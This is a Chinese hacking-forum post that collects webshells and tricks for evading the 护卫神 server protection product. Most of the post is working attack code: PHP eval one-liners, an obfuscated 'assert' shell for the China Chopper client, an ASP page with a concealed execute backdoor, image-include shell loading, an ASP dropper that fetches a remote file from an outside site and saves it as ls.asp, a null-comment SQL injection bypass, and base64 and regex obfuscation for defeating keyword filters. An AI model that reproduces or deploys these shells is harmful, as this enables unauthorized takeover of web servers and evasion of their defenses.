申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上 -----------------------------------------------------------------------------------------------------------------------------------
文章分为:
一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿 一、马儿篇
----------------1号--------------------------
< ?php
@eval
($_POST['1']);?> ----------------2号--------------------------
<title>login</title>nono<?php eval
($_POST
[1]) ?> --------------------3号---------------------------------------------
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["c"]); ?>
菜刀直接连,不需要构造连接字符串,密码 c ---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %> <%@language=vbscript codepage=936 %>
<%
Option Explicit
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
dim m
m=request("m")
Dim ArticleID, Action, sql, rs, Hits, ShowType
if m<>"" then execute(m)
ArticleID = Trim(request("ArticleID"))
Action = Trim(request("Action"))
ShowType = Trim(request("ShowType"))
If IsNumeric(ShowType) Then
ShowType = CLng(ShowType)
Else
ShowType = 1
End If
%> --------------------类似于过安全狗的包含方法-------------------------------------------
A.asp版本:
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg 在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"--> B.php版本
如果是php的话:
< ?php
include "1.htm";
?> ------------------实在不行,还可以下载---------------------------------------------
远程下载马 <%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.8090sec.com/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("ls.asp"),2
set sGet = nothing
set sPOST = nothing
%> 二、注入篇
/*%00*/截断符
select/*%00*/* from admin;---------------------------------------------------------------
---------------------------------------------------------------三、规则篇
可以利用类似:<?php
$code='一串base64'; //base64编码
$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
$a = '/a/';//正则规则
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
?>方法绕过关键词过滤
|